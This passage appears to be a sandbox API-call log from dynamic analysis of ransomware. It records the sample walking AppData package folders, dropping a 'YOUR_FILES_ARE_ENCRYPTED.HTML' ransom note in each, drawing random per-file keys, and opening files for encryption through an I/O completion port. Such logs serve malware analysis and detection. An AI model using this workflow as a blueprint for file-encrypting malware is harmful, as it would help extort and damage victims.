(HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.783] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="50") returned 2 [0114.783] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="AC") returned 2 [0114.783] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="EF") returned 2 [0114.783] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="19") returned 2 [0114.783] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="BC") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="00") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="65") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="A2") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="61") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="72") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="02") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="3D") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="39") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="8F") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="98") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="68") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C6") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="AE") returned 2 [0114.783] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="7B") returned 2 [0114.783] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="FD") returned 2 [0114.784] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="61") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="D3") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="C3") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="A0") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="B8") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="EA") returned 2 [0114.784] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="AC") returned 2 [0114.784] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="51") returned 2 [0114.784] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="42") returned 2 [0114.784] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="5B") returned 2 [0114.784] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="5C") returned 2 [0114.784] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="44") returned 2 [0114.784] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0114.784] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.784] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.785] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0114.785] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.785] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 191 [0114.785] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.785] lstrlenW (lpString=".LOG1") returned 5 [0114.785] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.785] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0114.785] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.785] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 191 [0114.785] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.785] lstrlenW (lpString=".LOG2") returned 5 [0114.785] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.785] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0114.785] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.785] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 196 [0114.785] GetProcessHeap () returned 0x600000 [0114.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\microsoft.accountscontrol_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.786] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.787] CloseHandle (hObject=0x32c) returned 1 [0114.787] GetProcessHeap () returned 0x600000 [0114.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.787] GetProcessHeap () returned 0x600000 [0114.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.789] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0114.789] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.789] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 180 [0114.789] GetProcessHeap () returned 0x600000 [0114.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\microsoft.accountscontrol_10.0.10586.0_neutral__cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.792] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.793] CloseHandle (hObject=0x324) returned 1 [0114.793] GetProcessHeap () returned 0x600000 [0114.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.793] GetProcessHeap () returned 0x600000 [0114.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.793] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0114.793] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.793] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState") returned 101 [0114.793] GetProcessHeap () returned 0x600000 [0114.793] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.793] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState" [0114.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState\\*" [0114.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.794] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.794] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.794] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.794] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0114.794] GetProcessHeap () returned 0x600000 [0114.794] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.794] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.795] CloseHandle (hObject=0x324) returned 1 [0114.795] GetProcessHeap () returned 0x600000 [0114.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.795] GetProcessHeap () returned 0x600000 [0114.795] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.796] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0114.796] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.796] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings") returned 97 [0114.796] GetProcessHeap () returned 0x600000 [0114.796] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.797] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings" [0114.797] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\*" [0114.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x90d2b129, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.800] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x90d2b129, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.800] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x611a2928, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x611a2928, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x611a2928, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0114.800] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.802] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\roaming.lock") returned 110 [0114.802] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.802] lstrlenW (lpString=".lock") returned 5 [0114.802] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.802] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x9104c20e, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9104c20e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0114.802] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.802] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat") returned 110 [0114.802] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.802] lstrlenW (lpString=".dat") returned 4 [0114.802] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0114.802] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0114.803] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0114.803] GetProcessHeap () returned 0x600000 [0114.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0114.805] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="1E") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="E3") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="11") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="64") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="85") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="46") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="15") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="70") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1E") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FA") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="CD") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="40") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="90") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="03") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="DE") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="41") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AC") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="81") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="83") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="8D") returned 2 [0114.805] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BC") returned 2 [0114.806] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="09") returned 2 [0114.806] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="C8") returned 2 [0114.806] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="5C") returned 2 [0114.806] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F1") returned 2 [0114.806] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B8") returned 2 [0114.806] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="5F") returned 2 [0114.806] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CC") returned 2 [0114.806] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AB") returned 2 [0114.806] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="39") returned 2 [0114.806] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F6") returned 2 [0114.806] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="42") returned 2 [0114.806] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat" [0114.806] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.806] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, 